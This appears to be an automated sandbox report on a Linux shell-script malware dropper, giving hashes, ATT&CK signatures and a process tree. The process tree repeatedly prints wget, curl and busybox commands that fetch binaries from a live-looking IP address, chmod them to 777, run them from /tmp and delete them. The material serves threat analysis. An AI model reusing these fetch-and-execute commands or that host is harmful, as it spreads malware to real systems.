27bdec6357a37139b79c10dced5ac64bea35e010a9c2e7e92cb715d7734fffbb

General

Target

27bdec6357a37139b79c10dced5ac64bea35e010a9c2e7e92cb715d7734fffbb.sh
Size

10KB
MD5

0e701247eed8c2ac85ce4310d37e674d
SHA1

7ca0caf639c6d80baffe549e24e3018daaa8bbb8
SHA256

27bdec6357a37139b79c10dced5ac64bea35e010a9c2e7e92cb715d7734fffbb
SHA512

0ef0aa05143b180e5260a49f2e87ebca0ecec3ab767bbbc7bc0761a2244b20b000aaffead5bd57071f0022821063d4c4ae9bb2efac893131009c19b2f57f556b
SSDEEP

96:PBRELvNSsmyUgEmy+bytMKk99ch83tkBRELvFSsQZFWyLJBmy+bytMs799chtE37:Y1myUgE5CVS3n

Score

7^/10

defense_evasion

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 28 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

Processes:

chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmod

pid	process
1648	chmod
1522	chmod
1564	chmod
1576	chmod
1552	chmod
1642	chmod
1570	chmod
1558	chmod
1588	chmod
1612	chmod
1678	chmod
1528	chmod
1606	chmod
1624	chmod
1630	chmod
1636	chmod
1600	chmod
1534	chmod
1540	chmod
1672	chmod
1516	chmod
1582	chmod
1594	chmod
1618	chmod
1654	chmod
1660	chmod
1666	chmod
1546	chmod

Executes dropped EXE 28 IoCs

Processes:

rpGQHUwVKCedv2rZ52NQukCAEyfangFC6myFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6sjNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk46wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgChkC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUKoieViux5SkcOflukQEESWqzwe8qoXmU0dorOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZTI1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYqA7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsHSKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkbWdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVArpGQHUwVKCedv2rZ52NQukCAEyfangFC6myFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6sjNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUKoieViux5SkcOflukQEESWqzwe8qoXmU0do6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgChrOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZTSKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkbWdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVAI1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYqA7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH

Writes file to tmp directory 28 IoCs

Malware often drops required files in the /tmp directory.

Processes:

curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurl

description	ioc	process
File opened for modification	/tmp/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT	curl
File opened for modification	/tmp/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA	curl
File opened for modification	/tmp/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4	curl
File opened for modification	/tmp/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys	curl
File opened for modification	/tmp/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT	curl
File opened for modification	/tmp/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m	curl
File opened for modification	/tmp/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb	curl
File opened for modification	/tmp/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH	curl
File opened for modification	/tmp/oieViux5SkcOflukQEESWqzwe8qoXmU0do	curl
File opened for modification	/tmp/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m	curl
File opened for modification	/tmp/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb	curl
File opened for modification	/tmp/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV	curl
File opened for modification	/tmp/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV	curl
File opened for modification	/tmp/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh	curl
File opened for modification	/tmp/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7	curl
File opened for modification	/tmp/oieViux5SkcOflukQEESWqzwe8qoXmU0do	curl
File opened for modification	/tmp/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4	curl
File opened for modification	/tmp/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA	curl
File opened for modification	/tmp/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK	curl
File opened for modification	/tmp/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK	curl
File opened for modification	/tmp/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq	curl
File opened for modification	/tmp/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq	curl
File opened for modification	/tmp/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7	curl
File opened for modification	/tmp/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s	curl
File opened for modification	/tmp/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys	curl
File opened for modification	/tmp/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh	curl
File opened for modification	/tmp/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH	curl
File opened for modification	/tmp/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s	curl

/tmp/27bdec6357a37139b79c10dced5ac64bea35e010a9c2e7e92cb715d7734fffbb.sh
/tmp/27bdec6357a37139b79c10dced5ac64bea35e010a9c2e7e92cb715d7734fffbb.sh
1⤵
PID:1507

/bin/rm
/bin/rm bins.sh
2⤵
PID:1508

/usr/bin/wget
wget http://87.120.84.230/bins/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m
2⤵
PID:1509

/usr/bin/curl
curl -O http://87.120.84.230/bins/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m
2⤵
- Writes file to tmp directory
PID:1514

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m
2⤵
PID:1515

/bin/chmod
chmod 777 rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m
2⤵
- File and Directory Permissions Modification
PID:1516

/tmp/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m
./rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m
2⤵
- Executes dropped EXE
PID:1517

/bin/rm
rm rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m
2⤵
PID:1518

/usr/bin/wget
wget http://87.120.84.230/bins/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s
2⤵
PID:1519

/usr/bin/curl
curl -O http://87.120.84.230/bins/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s
2⤵
- Writes file to tmp directory
PID:1520

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s
2⤵
PID:1521

/bin/chmod
chmod 777 yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s
2⤵
- File and Directory Permissions Modification
PID:1522

/tmp/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s
./yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s
2⤵
- Executes dropped EXE
PID:1523

/bin/rm
rm yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s
2⤵
PID:1524

/usr/bin/wget
wget http://87.120.84.230/bins/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4
2⤵
PID:1525

/usr/bin/curl
curl -O http://87.120.84.230/bins/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4
2⤵
- Writes file to tmp directory
PID:1526

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4
2⤵
PID:1527

/bin/chmod
chmod 777 jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4
2⤵
- File and Directory Permissions Modification
PID:1528

/tmp/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4
./jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4
2⤵
- Executes dropped EXE
PID:1529

/bin/rm
rm jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4
2⤵
PID:1530

/usr/bin/wget
wget http://87.120.84.230/bins/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys
2⤵
PID:1531

/usr/bin/curl
curl -O http://87.120.84.230/bins/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys
2⤵
- Writes file to tmp directory
PID:1532

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys
2⤵
PID:1533

/bin/chmod
chmod 777 6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys
2⤵
- File and Directory Permissions Modification
PID:1534

/tmp/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys
./6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys
2⤵
- Executes dropped EXE
PID:1535

/bin/rm
rm 6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys
2⤵
PID:1536

/usr/bin/wget
wget http://87.120.84.230/bins/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh
2⤵
PID:1537

/usr/bin/curl
curl -O http://87.120.84.230/bins/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh
2⤵
- Writes file to tmp directory
PID:1538

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh
2⤵
PID:1539

/bin/chmod
chmod 777 5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh
2⤵
- File and Directory Permissions Modification
PID:1540

/tmp/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh
./5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh
2⤵
- Executes dropped EXE
PID:1541

/bin/rm
rm 5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh
2⤵
PID:1542

/usr/bin/wget
wget http://87.120.84.230/bins/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7
2⤵
PID:1543

/usr/bin/curl
curl -O http://87.120.84.230/bins/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7
2⤵
- Writes file to tmp directory
PID:1544

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7
2⤵
PID:1545

/bin/chmod
chmod 777 kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7
2⤵
- File and Directory Permissions Modification
PID:1546

/tmp/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7
./kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7
2⤵
- Executes dropped EXE
PID:1547

/bin/rm
rm kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7
2⤵
PID:1548

/usr/bin/wget
wget http://87.120.84.230/bins/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK
2⤵
PID:1549

/usr/bin/curl
curl -O http://87.120.84.230/bins/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK
2⤵
- Writes file to tmp directory
PID:1550

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK
2⤵
PID:1551

/bin/chmod
chmod 777 NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK
2⤵
- File and Directory Permissions Modification
PID:1552

/tmp/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK
./NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK
2⤵
- Executes dropped EXE
PID:1553

/bin/rm
rm NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK
2⤵
PID:1554

/usr/bin/wget
wget http://87.120.84.230/bins/oieViux5SkcOflukQEESWqzwe8qoXmU0do
2⤵
PID:1555

/usr/bin/curl
curl -O http://87.120.84.230/bins/oieViux5SkcOflukQEESWqzwe8qoXmU0do
2⤵
- Writes file to tmp directory
PID:1556

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/oieViux5SkcOflukQEESWqzwe8qoXmU0do
2⤵
PID:1557

/bin/chmod
chmod 777 oieViux5SkcOflukQEESWqzwe8qoXmU0do
2⤵
- File and Directory Permissions Modification
PID:1558

/tmp/oieViux5SkcOflukQEESWqzwe8qoXmU0do
./oieViux5SkcOflukQEESWqzwe8qoXmU0do
2⤵
- Executes dropped EXE
PID:1559

/bin/rm
rm oieViux5SkcOflukQEESWqzwe8qoXmU0do
2⤵
PID:1560

/usr/bin/wget
wget http://87.120.84.230/bins/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT
2⤵
PID:1561

/usr/bin/curl
curl -O http://87.120.84.230/bins/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT
2⤵
- Writes file to tmp directory
PID:1562

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT
2⤵
PID:1563

/bin/chmod
chmod 777 rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT
2⤵
- File and Directory Permissions Modification
PID:1564

/tmp/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT
./rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT
2⤵
- Executes dropped EXE
PID:1565

/bin/rm
rm rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT
2⤵
PID:1566

/usr/bin/wget
wget http://87.120.84.230/bins/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq
2⤵
PID:1567

/usr/bin/curl
curl -O http://87.120.84.230/bins/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq
2⤵
- Writes file to tmp directory
PID:1568

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq
2⤵
PID:1569

/bin/chmod
chmod 777 I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq
2⤵
- File and Directory Permissions Modification
PID:1570

/tmp/I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq
./I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq
2⤵
- Executes dropped EXE
PID:1571

/bin/rm
rm I1cVH6lisaA2Z5eqx6Bw6tL62giQZbYCYq
2⤵
PID:1572

/usr/bin/wget
wget http://87.120.84.230/bins/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH
2⤵
PID:1573

/usr/bin/curl
curl -O http://87.120.84.230/bins/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH
2⤵
- Writes file to tmp directory
PID:1574

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH
2⤵
PID:1575

/bin/chmod
chmod 777 A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH
2⤵
- File and Directory Permissions Modification
PID:1576

/tmp/A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH
./A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH
2⤵
- Executes dropped EXE
PID:1577

/bin/rm
rm A7RxaBh8YMlZ9yHoHdQ1x8ztpyJYFvnnsH
2⤵
PID:1578

/usr/bin/wget
wget http://87.120.84.230/bins/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb
2⤵
PID:1579

/usr/bin/curl
curl -O http://87.120.84.230/bins/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb
2⤵
- Writes file to tmp directory
PID:1580

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb
2⤵
PID:1581

/bin/chmod
chmod 777 SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb
2⤵
- File and Directory Permissions Modification
PID:1582

/tmp/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb
./SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb
2⤵
- Executes dropped EXE
PID:1583

/bin/rm
rm SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb
2⤵
PID:1584

/usr/bin/wget
wget http://87.120.84.230/bins/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV
2⤵
PID:1585

/usr/bin/curl
curl -O http://87.120.84.230/bins/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV
2⤵
- Writes file to tmp directory
PID:1586

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV
2⤵
PID:1587

/bin/chmod
chmod 777 WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV
2⤵
- File and Directory Permissions Modification
PID:1588

/tmp/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV
./WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV
2⤵
- Executes dropped EXE
PID:1589

/bin/rm
rm WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV
2⤵
PID:1590

/usr/bin/wget
wget http://87.120.84.230/bins/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA
2⤵
PID:1591

/usr/bin/curl
curl -O http://87.120.84.230/bins/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA
2⤵
- Writes file to tmp directory
PID:1592

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA
2⤵
PID:1593

/bin/chmod
chmod 777 8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA
2⤵
- File and Directory Permissions Modification
PID:1594

/tmp/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA
./8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA
2⤵
- Executes dropped EXE
PID:1595

/bin/rm
rm 8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA
2⤵
PID:1596

/usr/bin/wget
wget http://87.120.84.230/bins/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m
2⤵
PID:1597

/usr/bin/curl
curl -O http://87.120.84.230/bins/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m
2⤵
- Writes file to tmp directory
PID:1598

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m
2⤵
PID:1599

/bin/chmod
chmod 777 rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m
2⤵
- File and Directory Permissions Modification
PID:1600

/tmp/rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m
./rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m
2⤵
- Executes dropped EXE
PID:1601

/bin/rm
rm rpGQHUwVKCedv2rZ52NQukCAEyfangFC6m
2⤵
PID:1602

/usr/bin/wget
wget http://87.120.84.230/bins/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s
2⤵
PID:1603

/usr/bin/curl
curl -O http://87.120.84.230/bins/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s
2⤵
- Writes file to tmp directory
PID:1604

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s
2⤵
PID:1605

/bin/chmod
chmod 777 yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s
2⤵
- File and Directory Permissions Modification
PID:1606

/tmp/yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s
./yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s
2⤵
- Executes dropped EXE
PID:1607

/bin/rm
rm yFnPbQOCd1fQG8k19ZLRK92wgpRJbsXV6s
2⤵
PID:1608

/usr/bin/wget
wget http://87.120.84.230/bins/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4
2⤵
PID:1609

/usr/bin/curl
curl -O http://87.120.84.230/bins/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4
2⤵
- Writes file to tmp directory
PID:1610

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4
2⤵
PID:1611

/bin/chmod
chmod 777 jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4
2⤵
- File and Directory Permissions Modification
PID:1612

/tmp/jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4
./jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4
2⤵
- Executes dropped EXE
PID:1613

/bin/rm
rm jNcFxYwoV2rAUSyqtGN2RAWbZKxtwyJgk4
2⤵
PID:1614

/usr/bin/wget
wget http://87.120.84.230/bins/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7
2⤵
PID:1615

/usr/bin/curl
curl -O http://87.120.84.230/bins/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7
2⤵
- Writes file to tmp directory
PID:1616

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7
2⤵
PID:1617

/bin/chmod
chmod 777 kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7
2⤵
- File and Directory Permissions Modification
PID:1618

/tmp/kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7
./kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7
2⤵
- Executes dropped EXE
PID:1619

/bin/rm
rm kC7HpW6gtPSIujAMozgBOsauSzKfTjwvO7
2⤵
PID:1620

/usr/bin/wget
wget http://87.120.84.230/bins/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK
2⤵
PID:1621

/usr/bin/curl
curl -O http://87.120.84.230/bins/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK
2⤵
- Writes file to tmp directory
PID:1622

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK
2⤵
PID:1623

/bin/chmod
chmod 777 NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK
2⤵
- File and Directory Permissions Modification
PID:1624

/tmp/NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK
./NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK
2⤵
- Executes dropped EXE
PID:1625

/bin/rm
rm NROXbURA4DVm1ngj1Tu17e4f45s2CdpPUK
2⤵
PID:1626

/usr/bin/wget
wget http://87.120.84.230/bins/oieViux5SkcOflukQEESWqzwe8qoXmU0do
2⤵
PID:1627

/usr/bin/curl
curl -O http://87.120.84.230/bins/oieViux5SkcOflukQEESWqzwe8qoXmU0do
2⤵
- Writes file to tmp directory
PID:1628

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/oieViux5SkcOflukQEESWqzwe8qoXmU0do
2⤵
PID:1629

/bin/chmod
chmod 777 oieViux5SkcOflukQEESWqzwe8qoXmU0do
2⤵
- File and Directory Permissions Modification
PID:1630

/tmp/oieViux5SkcOflukQEESWqzwe8qoXmU0do
./oieViux5SkcOflukQEESWqzwe8qoXmU0do
2⤵
- Executes dropped EXE
PID:1631

/bin/rm
rm oieViux5SkcOflukQEESWqzwe8qoXmU0do
2⤵
PID:1632

/usr/bin/wget
wget http://87.120.84.230/bins/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys
2⤵
PID:1633

/usr/bin/curl
curl -O http://87.120.84.230/bins/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys
2⤵
- Writes file to tmp directory
PID:1634

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys
2⤵
PID:1635

/bin/chmod
chmod 777 6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys
2⤵
- File and Directory Permissions Modification
PID:1636

/tmp/6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys
./6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys
2⤵
- Executes dropped EXE
PID:1637

/bin/rm
rm 6wRKuq6zGCUhxwh381Y6UHgfV4YL8jFcys
2⤵
PID:1638

/usr/bin/wget
wget http://87.120.84.230/bins/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh
2⤵
PID:1639

/usr/bin/curl
curl -O http://87.120.84.230/bins/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh
2⤵
- Writes file to tmp directory
PID:1640

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh
2⤵
PID:1641

/bin/chmod
chmod 777 5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh
2⤵
- File and Directory Permissions Modification
PID:1642

/tmp/5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh
./5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh
2⤵
- Executes dropped EXE
PID:1643

/bin/rm
rm 5yvUIoKrQrh6YKqWUE0PSxnUJz7TDzbgCh
2⤵
PID:1644

/usr/bin/wget
wget http://87.120.84.230/bins/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT
2⤵
PID:1645

/usr/bin/curl
curl -O http://87.120.84.230/bins/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT
2⤵
- Writes file to tmp directory
PID:1646

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT
2⤵
PID:1647

/bin/chmod
chmod 777 rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT
2⤵
- File and Directory Permissions Modification
PID:1648

/tmp/rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT
./rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT
2⤵
- Executes dropped EXE
PID:1649

/bin/rm
rm rOkI1FzF5oENzG4865Ss7XWH7x89e8v5ZT
2⤵
PID:1650

/usr/bin/wget
wget http://87.120.84.230/bins/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb
2⤵
PID:1651

/usr/bin/curl
curl -O http://87.120.84.230/bins/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb
2⤵
- Writes file to tmp directory
PID:1652

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb
2⤵
PID:1653

/bin/chmod
chmod 777 SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb
2⤵
- File and Directory Permissions Modification
PID:1654

/tmp/SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb
./SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb
2⤵
- Executes dropped EXE
PID:1655

/bin/rm
rm SKgCDzu7j9RD5Ddnm7oh5YNEzO3lHMAmkb
2⤵
PID:1656

/usr/bin/wget
wget http://87.120.84.230/bins/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV
2⤵
PID:1657

/usr/bin/curl
curl -O http://87.120.84.230/bins/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV
2⤵
- Writes file to tmp directory
PID:1658

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV
2⤵
PID:1659

/bin/chmod
chmod 777 WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV
2⤵
- File and Directory Permissions Modification
PID:1660

/tmp/WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV
./WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV
2⤵
- Executes dropped EXE
PID:1661

/bin/rm
rm WdgxYVaSyw3lHHZb2zWDLQ0ySbUZ0WW9KV
2⤵
PID:1662

/usr/bin/wget
wget http://87.120.84.230/bins/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA
2⤵
PID:1663

/usr/bin/curl
curl -O http://87.120.84.230/bins/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA
2⤵
- Writes file to tmp directory
PID:1664

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA
2⤵
PID:1665

/bin/chmod
chmod 777 8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA
2⤵
- File and Directory Permissions Modification
PID:1666

/tmp/8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA
./8lhi2T2M1qlMZiZs7ksOnBBhA5rJ47mgVA
2⤵
- Executes dropped EXE
PID:1667

/bin/rm
